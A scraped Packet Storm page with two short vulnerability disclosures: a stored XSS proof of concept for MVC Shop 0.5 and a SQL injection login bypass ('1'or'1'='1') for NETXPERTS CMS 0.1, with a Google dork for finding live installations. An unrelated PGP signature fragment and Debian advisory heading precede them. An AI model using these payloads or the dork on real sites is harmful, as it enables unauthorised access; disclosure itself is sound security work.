SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSAuzkACgkQEMKTtsN8TjYkHw//YSLfIYssjDXV6CkcW1SO+qGwPwB8/57wUJEpA8x73DjUhbUgatpbyuaKHWYX7knrTT7PG1nHgRaBWkWp+TFfpjsOEo/C6guIgwkYQ6GPLePLJe7RwWI2NxzH+o9GgqZhzJ34BC7YQd2FWKGe59cYE26TAqk8R7rSTi9PnPtZqO5Y7BlKo8g8WjJhIYLG8N58zFKxDQxt6XKwkKVJIIbImAb5qOGpThSB05vuan36EyX8UZWHoj5ao+z1gUL9HbSkznfEZUYpHIOf2VNcrI3DCrxJejESmtWaeL8XPC7PlVEgfOZoFIvdMo9ZY6hLUOGe1uWeozTSBELyRvvXdWRiSlmY1W4AysD5/3cOppCbyR+eixUgUMhCLNcYs8gHut/MFILMYMAlegDScNp3r4kZBSjyXX+ftEoagBSSHw0AFXswj8wb5adbalrWybH8Ky44BT2G3cd5tk1GAn/hh3WMoq+lOmB498UmTSuQe9PV+4FRdbYSPlIBotnmAQcASLeJLutlO2qjqf1DTO+mRA0MciIzoIsPjNNI9LxnWoPuMhsZb4KhuxJUfpSDWVoHDbqc7cTpzRTgJ0UnuTbNNUK6puDHhb3427u1T+tsAw0jEeYpg/0PhhRZfptz4RF9iFFFokKvpBdFOlAo643XD6yFCQjKfMDyJ5xdmUu2Ce1r2fw==HC9u-----END PGP SIGNATURE-----

Debian Security Advisory 5420-1

MVC Shop version 0.5 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : mvc-shop v0.5 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5                                                        || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Register a new membership and enter the membership control panel and choose to modify the member's profile and in the name field put any payload that suits you and then save the changes[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/chikoiquan.tanhongitcom/        == Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

MVC Shop 0.5 Cross Site Scripting

NETXPERTS CMS version 0.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : NETXPERTS-CMS v0.1 Auth By Pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://netxperts.in/                                                                                               |  | # Dork      : "Designed by NETXPERTS"                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1[+] https://127.0.0.1/sivasudartravels/admin/production.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Source

Packet Storm